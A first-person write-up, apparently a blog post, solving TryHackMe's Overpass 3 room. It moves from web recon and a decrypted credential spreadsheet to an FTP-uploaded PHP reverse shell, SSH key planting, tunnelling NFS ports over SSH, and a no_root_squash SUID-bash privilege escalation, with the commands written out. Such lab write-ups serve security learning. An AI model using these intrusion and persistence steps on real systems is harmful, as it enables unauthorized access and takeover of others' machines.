This is going to be a detailed room write-up on how do we get to the James user and what challenges were faced while port forwarding various ports to mount the NFS share of a user. For more such boxes checkout TryHackMe
Above all the “hard boxes” I did till date, neither of them were as challenging as this… Now, again this wasn’t a hard box, this was just challenging… It’s just hard to spot something so abstract like this. Kudos to NinjaJc01 (aka james) for his amazing efforts on this box. This box. Is. Awesome. TO CHALLENGE YOUR SKILLS TO THEIR FULLEST.
This was a real-life based box. Although before I start with the actual writeup I would like you take a few hints from from the “Try Harder” section in case you don’t want to spoil the fun in exploiting stuff on your own. Again, I am just a guy who is still learning so let me know if I go wrong anywhere.
Most of us were stuck at the james user… I personally took 6 long hours sticking just to find an approach to the user.flag residing inside the james home dir.
- Hint 1: Scan for inner ports opened to localhost.
- Hint 2: Is there any service running that could give you access to james dir?
- Hint 3: Think of a way how you can exPORT that service so that you can access it on your attacker machine and move FORWARD…
N this is what we are gonna do ahead… now, go on and try harder.
I am using attackbox for this because it’s on internal network and network speed is no less than 26mbps.
If you’re not subscribed like me… You can still do fast recon on the attackbox, copy the useful notes on pastebin and retrieve them on your attacker machine.
nmap -A -oN initial/nmap -vv <IP>
Here we can see that we have 3 ports opened:
Great so we have http open so let’s start with directory scan before starting with further enumeration
gobuster dir -u http://IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,css,js,txt,phtml,aspx
Now until this is happening let’s checkout ftp and http.
Ok, seems like anonymous login is disabled. Np, will see this later. Let’s get to the website.
Great we have some users here… (At the time of doing this box I created a username.txt list with all these users scraped with cURL; but never needed it. Oops sorry for the spoiler) Let’s view the page source…
Nothing special here either. Let’s get back to our gobuster scan see if we have something special…
Aha!! A backup directory… Let’s view it…
Cool let’s download it and extract the zip file
Alright, so now we have a PGP encrypted file with a key… I didn’t knew how to extract a PGP encrypted file. I searched online and came up with a method… First we need to import the priv.key and then decrypt it using the -d flag.
But when I viewed the decrypt.txt it showed me a bunch of crap, which seemed to be broken xml? I tried changing the file extension to decrypt.xml and open it in browser, it didn’t worked. Later I put my focus on the .gpg extension that it was an EXCEL FILE. Similarly when I viewed it with file command it showed me that it was Microsoft Excel 2007+ file.
Now, there are 2 ways from here… Either switch to the machine where you have excel installed (because believe me there is hardly anyone who have office installed on their attacker machine(including me); which is a bad thing, you must have an offline way of analyzing the files you find during a pentest)
OR you could use google sheets to view the file, just upload it and view it their. Also, you could install libreoffice on your kali VM (on ubuntu I guess you get it pre-installed).
Gladly I was still using attackbox, so I used the superfast net connection to download the libreoffice on it and then view the file. (apt install libreoffice)
I opened up LibreOffice Calc and found the following contents in the file.
Oooh. We got some credentials.
Sidenote: Don’t get too excited, those credit card nos. aren’t real I tried them all on netflix.
Ok, back to the challenge… Hmm let’s see can we use these credentials on ssh?
Permission denied… I tried other usernames as well but didn’t work, which tells us more about the target that the user’s may not be present on the system. I thought wonder what this “publickey,gssapi-keyex” permission denied is? It’s new to me… So I googled it…
Hmm seems like this error occurs when password authentication is disabled, which means to access ssh, we either need a direct private key. Now, at this point I was a bit confused where to find such key.
I then suddenly thought of… What if!! The credentials aren’t for ssh, I mean we have FTP also open right… So I tried FTP.
Voila, first user paradox, and first password. I got in… Feels great no? Nvm, so when I ls I didn’t find anything special, same old backups folder(you can try get it on your attacker box and extract it but it’s the same file in which we got paradox’s credentials).
I kept thinking and thinking, talking to myself for about a minute or 2, and observed that this is the same old web directory… that I scanned earlier. I solved the exact same box just a few days ago (couldn’t remember the name) in which we got ftp into the web directory and we upload a reverse shell their and activate it via the browser. So, I tried it, and uploaded php-reverse-shell.php (after changing my IP to the IP of attackbox).
Now let’s browse to http://IP/php-reverse-shell.php…
The site keeps loading…
And we get our reverse shell. Awesome. We got the initial shell. Let’s stabilize it first, and then we will move forward.
You can see that earlier I tried python, it didn’t worked, so I tried with python3, and proceeded ahead.
Now if this didn’t work as well you could try /bin/bash -i (instead of python3) to stabilize your shell. Sounds annoying but trying is what all we got.
7h3 W3b Fl46
Now, that we have a shell let’s find the web flag first. Now, I first searched for the flag like this…
find / -name web.txt 2>/dev/null
It didn’t got me anything… I tried a bunch of things, but couldn’t find any, so I looked at the hint in the task(I personally consider this as cheating because in real life you don’t have any hints; Try to avoid them, as much as possible).
The Hint: This flag belongs to apache
Ok, got it… So if the flag belongs to apache, it must be in it’s home directory…
which turns out to be /usr/share/httpd
Bingo!! I finally figured out why my find web.txt wasn’t working… It was set to web.flag instead of web.txt. Atleast we now know that the flags are stored in .flag format. Hmm. Let’s move ahead.
P4r4d0x 15 4 57udy 0f f34r
I don’t know what came out of my instinct that I tried to login as paradox
I got a stable shell as user paradox.
Optional: This method came up when I re-deployed machine some other day for creating this writeup. You can also bypass the ssh login for paradox, BY ADDING YOUR PUBLIC KEY IN authorized_keys FILE PRESENT IN PARADOX’S .ssh DIRECTORY.
Copy the contents id_rsa file from .ssh directory to your attacker machine, modify the file permissions to 600 and then login with -i flag, but that’s not there either in the .ssh directory. So thus, we will use the other method that I mentioned above.
You can see in the 1st pane that I used ssh-keygen command to generate a pair of public and private keys, and then cat out my public key in the .ssh directory.
In the second pane I am in the paradox machine and pasting the contents of my public key in authorized_keys. Now let’s see if we can login via ssh or not.
Without. A. Password.
1 f33l l0n3ly 4lr34dy
Hmm, the user flag at this point, I thought won’t be a challenge. I mean I completed this room till here in what 45 mins? I felt over-confident. But I didn’t knew that this was going to be the toughest CHALLENGE (not hardest; because it is hackable, it’s not like it’s inevitable boss level, it’s pretty normal to go on once you know what you have to do, but until then… it was like my hell loop 😫 ) I could ever face.
Now, feel free to skip the rest of the write-up up till “7h3 U53r Fl46”, where I finalize how it all can be done in 1 go. If you want to know how it all came in one piece with hit and trial… KEEP CALM AND KEEP READIING.
L057 1n 71m3
All right, now, due to my over-confidence I didn’t got checked any privesc cheatsheets, rome here and there to find something useful. But as we know, I couldn’t. Starting with:
Hmm the last line… Seems like we need to use -S flag too.
Sadly we can’t.
My IP seemed changed from this section onwards… This is because I accidentally clicked terminate instead of add 1 hour(while creating this writeup). FML.
Let’s see if we have any SUIDs/SGIDs
I listed them, but these are dead ends… I banged my head way more on “HOW TO CONVERT SUID WITH SUDO PRIVILEGES” because both of them can give root if run with sudo permissions, sadly our user can’t do that. But even with just SUID bit set, they are of no use. Trying on them would be banging our head on wall. I personally wasted about 30 mins alone on this one for no reason, thought to research something new. Ugh nvm, moving forward.
Let’s check for any cronjobs…
Nothing here either… Later got tired and watched the hint for Question 2 😅
Hint 2: “This flag belongs to james”
I thought, ohh that’s why nothing is available for us here. Alright, let’s see the james…
Ok, I then went into a new terminal and tried all 3 passwords found in the excel sheet from the backups directory. But that didn’t worked either.
OKAY, at this point I had ideas, but didn’t want to try them #FeelingLazy, as the box till here was typical easy for me. So, I went directly for LinPeas.
Oops! wget isn’t on the box… I guess they don’t want us to use LinPeas.
SideNote: I didn’t thought of cURL the linpeas file from the attackbox, which I generally don’t forget as an alternative option. This often happens when working on a box, so stop being confident and keep a checklist of things.
So, I tried various other methods like doing a recursive search for james user in any of the file.
grep -iRl james /
OR recursive search for OPENSSH file keys… In case, their is a hidden ssh key lying around for james.
grep -iRl “BEGIN OPENSSH” /
but didn’t find anything either. I also tried searching for files owned by james so that their could be a secret note for us to read, but the only files I could find were james home directory and mail file in spool directory, which unfortunately wasn’t readable by us. Infact they weren’t containing any data.
Tip: Do check the /opt directory once, manually. That directly, most of the times stay empty. If not, there are user stored files, which can be useful to us.
I was going crazy couldn’t think properly. Almost 2 hours past by… I couldn’t find anything, I thought I might be missing something, so I again shifted my focus to linpeas. I went for copy pasting the the linpeas file from terminal.
Note: You noticed that I was on attackbox and hence, to copy paste anything as big as the linpeas code, wasn’t happening for me. Call it the buffer size limit to copy paste via the clipboard or just a bug in terminal to not pasting the buffer that long…
Ohh, seems like I can’t copy paste. Great.
I pushed the chair back, stood up, had a little water. Thought of “HOW CAN I TRANSFER THE FILE TO THE SERVER”. A minute later I came back and opened up a notepad to write the following things.
- SWITCH BACK TO PERSONAL MACHINE(WHICH HAS MORE BUFFER SIZE TO COPY PASTE)
Gladly, got the linpeas in the first one. I learnt one more thing that day… I knew the following things (all 4 worked), the only thing needed was to KEEP CALM AND THINK PEACEFULLY.
Yea, I missed the dot there nvm. Moving on, I ran the scan, and from there I noticed a few things that seemed suspicious and tried them, re-tried them, re-re-tried some of em. I had a doubt on this one…
But in a full portbrunning, neither an open NFS service… May be the port is filtered? and blocking nmap pings? So I also ran a custom made port scanner, made a few months back, but didn’t got anything either. I tried enumerating the log files so that I could find atleast something… Still nothing😭. I was sure that no-root-squash had something to do with the box. SO FOR THE LAST TIME I THOUGHT, that what if I could mount the directory locally itself and view it.
Hurray, that means there is nfs service running on the internal port… And we can use it to mount it, and I just already mounted it…
That I remember, that mount needs to be run with sudo privileges. Ugghhh WHAT THE HASH!!!. By then I knew that this was not the intended method and enumerated something else… But NOTHING ELSE WAS THERE…
“Uh-Oh! You have deployed this machine for too long” warning popped up when I tried to extend the machine for further more time. At this time I lost all the hopes and I literally went for help on TryHackMe’s Discord server… Where I was reminded !rule 13, No hints are to be given before 72 hours are completed of the room release. Alright, then I went on TryHackMe’s Forum and created a new thread, hoping that somebody would answer me 😭.
I lost track of time, I forgot that I had a class to attend about an hour ago, and I missed it. The room release was around to be 24 hours old… I was sick and tired for sitting infront of my system for more than 5 hours after the last break I took. I needed some mind off, sometime to relax.
7h3y c4ll m3 4 m4dm4n
I went off for lunch around 6pm, fell asleep and woke up around 12pm. Washed my face, kinda cursed myself in the mirror for not able to solve a medium box. Then had some snacks and checked my messages. A few people from the tryhackme’s discord PM’ed me about, “hey, are you able to solve the room yet? I am still stuck at getting to the james user…” I replied them, “been stuck there for 7 hours, tried to run mount on the victim’s machine but didn’t had root privileges to do so… Ugh! I wish I had em”. Chatted a little bit and then went back to see, just by chance is their any change in the box 😅. I didn’t even opened my VM properly that my dad came into my room and scolded me for “sleeping all day and now you think you should play games?!”. I ignored him, and got back to my desk.
That night I felt confident because I was working with my personal attackbox and I know how great it is to work-out with your personal things.
When I went back and opened tryhackme, got a few messages in PM too, regarding the thread I posted, same as asking for any hints, well I wasn’t james myself, so how could I give any?? Any how, I found a reply to my thread that I posted…
Now, the idea I got was, what if… I was able to… Run the nfs mount as root, locally on my attacker machine(because locally I have a access to root privs on the sytem)? But I know there weren’t any external ports open for the mount right? The mount was enabled locally… So, now what if, that ports could be available to us on our attacker machine… So I did a simple google search… “HOW TO USE LOCAL PORTS OF ONE MACHINE ON ANOTHER”
Here I remember that I did port forwarding earlier for accessing the jenkins server hosted on the “Internal” Network (It’s a room on tryhackme named “Internal”. Do check it out!) So, It took me around just a few hours that night, “THAT ALL I HAD TO DO WAS PORT FORWARD THE NFS PORTS AND MOUNT THE SHARED FILE SYSTEM LOCALLY ON MY ATTACKER MACHINE WITH ROOT ACCESS”. Then I did my normal research on how to port forward the NFS file system. I found some links… Followed the tutorial and figured out that it’s pretty easy…
Although there were a few blanks in my thinking… Starting with…
- Which port to forward?
Well when it comes to analyzing the port activity… I close my eyes and use,
YOU GOTTA BE KIDDIN’ ME!!! AGAINNN!!!??? So as usual, I searched the web… ‘ALTERNATIVE TO NETSTAT LINUX”
I love the google!! 💙 ❤️ 💛 💙 💚 ❤️
ss is an alternative to netstat that we can use. So if we run a basic command like:
It will list us all the processes that running on the host… Now, if we want to search for any “local ports” listening we need to sort the output for “local address” listed as either 0.0.0.0 or 127.0.0.1. We can use grep for that…
ss -an | grep -E “0.0.0.0|127.0.0.1”
Now, you can sort it further too, to get a list of ports only. Note that, the ports on listening are the only ones that’s use to us, as these are the ports that will listen to the connection if a request to mount a particular file system is made. Moreover, you can view the service running on these ports by just running.
ss -a | grep -E “0.0.0.0|127.0.0.1”
i.e. running without -n flag.
Now, try to relate using the above image which port is running which service. For us, we just need the nfs port… That turns out to be 2049. Great all we gotta do is port forward this port via SSH Tunneling(Port Forwarding), and then mount the james share on our attacker machine using sudo…
In pane 1 I created an ssh tunnel over the victim machine’s port 2049 to my port number 2049. In pane 2 I tried to mount the file system, but got an error.
Huh, that’s strange… What else do you need to work? I searched for this on google, it said, TO RESTART THE SERVICE TO FIX THE ERROR…
Not kiddin’ , that was literally my reaction, at that moment of the night. Moving on… I scratched my head for a bit… I thought, may be that’s not what the mount needs… I doubted on another port… The mountd port (i.e. 20048) so let’s connect to that instead…
Nope didn’t work either… Now, after this, I literally tried to tunnel every port, randomly. Didn’t work… N I went crazy…
I then did a small research on “HOW TO VIEW NFS SHARE VIA SSH TUNNELING”, and I came up with this link: Tunneling NFS through SSH???? (unix.com).
If you look carefully, this guy forwarded 2 ports to link NFS to his local machine… Firstly, the NFS port, then the mountd port… Alright, seems fair enough. Let’s try that.
Ok, in pane 1 I have mountd port forwarded, and in pane 2 I have NFS port forwarded… In the pane 0 you can see that the mount didn’t worked, same error. I wonder why?
I scratched my head a bit… Kept wondering why am I not getting the shell, so on the same forum I scrolled a bit, and found this answer…
He suggested to use RPC channel too… So I thought why not, let’s add a third port…
Oh ouu, what’s this… May be we’re not allowed to use port 111. But that’s not the problem… I mean, when we view the activity on port 111, on the overpass machine it was on listening mode… And we know that listening ports can be forwarded (so that the connections made to listening port can also be available elsewhere), but, a port cannot be forwarded to already listening port for connections of it’s own…
Well, if that’s the case let’s verify it.
Yeaps right other local port is working without changing the destination port… The problem is on my side 😅. Or you could just run the following command to see the activity of a port.
netstat -antp | grep 111
This error occured while creating this writeup as previously when I worked on this machine… I did stuff told before to test a few things and activated rpcbind.service from the systemctl start which was occupying the listening port 111 now. Thanks to @NinjaJc01 on discord for giving me an idea of service systemd running as pid 1. And when I tried to kill that process it closed my system, and on the system restart, it restarted. So it was annoying.
I told this to you so just in case if you get stuck in situation like this, you can get yourself out of it.
Firstly, close the rpcbind service itself, disable it and then mask it.
sudo systemctl stop rpcbind
sudo systemctl disable rpcbind
sudo systemctl mask rpcbind
At last close the rpcbind.socket and then disable it too.
You can see that our port is now closed. So, now that the port is finally closed… Let’s try forwarding the third port and see if we can access james or not…
Oh oh, what’s this? Seems like the service we just closed and masked needs to be running for this work…
We could just specify -o nolock instead… which looks so more easy… so let’s run the same command with nolock appended to it.
7h3 U53r Fl46
Let’s summarize our steps…
- Starting with bringing the linpeas.sh to the Overpass’s machine via cURL, modifying the permissions and running the linpeas scan.
- Noting no-root-squash property, I tried to establish local nfs mount but couldn’t because of lack of root permissions.
- Searched for inner ports i.e. via ss -an(netstat wasn’t on the machine). N figured out a way, to get the nfs working… i.e. Port forwarding.
- So, I port forwarded the NFS port… But it didn’t worked, so I searched more and saw that to port forward NFS shares, we need to tunnel through 3 ports… Namely RPC(for channelling), NFS(for mount info and interacting with), mountd(for mounting and transferring files across the network).
Finally got the USER FLAGGG 😢 after so long.
Sidenote: This wasn’t an absolute victory… But I felt really awesome after it. 3:30am and I felt blessed. Coz, that night only took me 1.5 hours to get the user flag.
Now, as I said in the starting of the writeup this wasn’t a tough room to solve, it was challenging, but once, you know what to do, rest all is a little bit of research. 😉
Ok, enough with the crap talk let’s move on to the r007 flag
7h3 R007 Fl46
Ok, am not gonna lie, I solved a room before on how to bypass the root access with no-root-squash and get root. So, this hardly took me 2 mins (MAX)
sudo su; cd /tmp; cp /bin/bash . ; chmod +s /bin/bash;
Also, edit the james’s authorized key so that you can login into his account via ssh.
Login into james and run the SUID with -p flag set.
You got the root, and you know where you can find the root flag. 😉
The other way is no different, you can create your custom SUID, with the following command:
echo “/bin/bash -p” > bash; chmod +s bash;
and then login into james’s account then run the SUID. You get the r00t.
First of all, this was one of the longest writeup I ever wrote lol… Now if you have reached this point, with all the reading, CONGRATS, because neither I had the stamina to read all of it in one go, this is day 3 of making this writeup and today I finished it finally.
What’s with such long write-up?
- Ikr, it was tiring, it’s because there were a lot of people messaging me on the discord and even via the direct message in tryhackme server, to give them hints and tell them, how did I solved the room, so I LITERALLY WENT ALL N00B AND STARTED EXPLAINING EVERY SINGLE BIT.
Now, I don’t know if you guys liked the way I explained this writeup, enjoyed the extra information I shared, or if you be thinking that I OVERSHARED EVEN THE VERY BASICS STUFF. I just don’t know, so please… Be kind enough to let me know in the comments. I could really use your response. Plus, do let me know if you want more such writeups.
Lastly I just wanna say that I am still learning or may be I am just another n00b whose luck worked and did the room in the first 36 hours of it’s release, without any hints, just some music to keep me active throughout the late night.
IMPORTANT: IF YOU FIND ANY ISSUES WITH THE WRITEUP OR ANY QUERIES FEEL FREE TO REACH ME OUT AT DISCORD: j4x0n or you can find my socials at the top of the writeup.